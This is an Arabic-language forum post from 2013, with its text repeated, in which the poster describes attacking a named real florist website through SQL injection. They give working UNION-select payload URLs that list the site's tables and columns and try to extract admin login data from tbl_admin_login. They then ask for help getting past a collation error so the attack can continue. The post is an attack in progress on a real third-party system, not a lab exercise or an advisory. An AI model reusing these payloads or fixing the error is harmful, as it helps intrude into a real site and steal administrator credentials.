FreSe You
05-18-2013, 11:11 PM
السلام عليكم ورحمة الله تعالى وبركاته
إخواني عندي استفسار بسيط وهو حول sql_injection
أنا أستغليت موقع
http://www.londonflowernet.co.uk/category.php?cat_id=18
فاستغرجت منه الجدوال بطريقة دي
http://www.londonflowernet.co.uk/category.php?cat_id=-18+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18+from+information _schema.tables+where+table_schema+like+0x666c6f776 5726c6f6e646f6e6b6f6c--
ثم إستخرجت الأعمدة بالطريقة دي
http://www.londonflowernet.co.uk/category.php?cat_id=-18+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18+from+informatio n_schema.columns+where+table_name+like+0x74626c5f6 1646d696e5f6c6f67696e--
ثم حاولت أستخرج إيم الأدمن بالطريقة دي
http://www.londonflowernet.co.uk/category.php?cat_id=-18+union+select+1,group_concat(adminid),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18+from+tbl_admin_logi n--
و زي ما شافين تطلعلي الرسالة دي
Illegal mix of collations for operation 'UNION'
ياترى شو المشكلة وشو الحل
أرجو الرد
تحياتي
إخواني عندي استفسار بسيط وهو حول sql_injection
أنا أستغليت موقع
http://www.londonflowernet.co.uk/category.php?cat_id=18
فاستغرجت منه الجدوال بطريقة دي
http://www.londonflowernet.co.uk/category.php?cat_id=-18+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18+from+information _schema.tables+where+table_schema+like+0x666c6f776 5726c6f6e646f6e6b6f6c--
ثم إستخرجت الأعمدة بالطريقة دي
http://www.londonflowernet.co.uk/category.php?cat_id=-18+union+select+1,group_concat(column_name),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18+from+informatio n_schema.columns+where+table_name+like+0x74626c5f6 1646d696e5f6c6f67696e--
ثم حاولت أستخرج إيم الأدمن بالطريقة دي
http://www.londonflowernet.co.uk/category.php?cat_id=-18+union+select+1,group_concat(adminid),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18+from+tbl_admin_logi n--
و زي ما شافين تطلعلي الرسالة دي
Illegal mix of collations for operation 'UNION'
ياترى شو المشكلة وشو الحل
أرجو الرد
تحياتي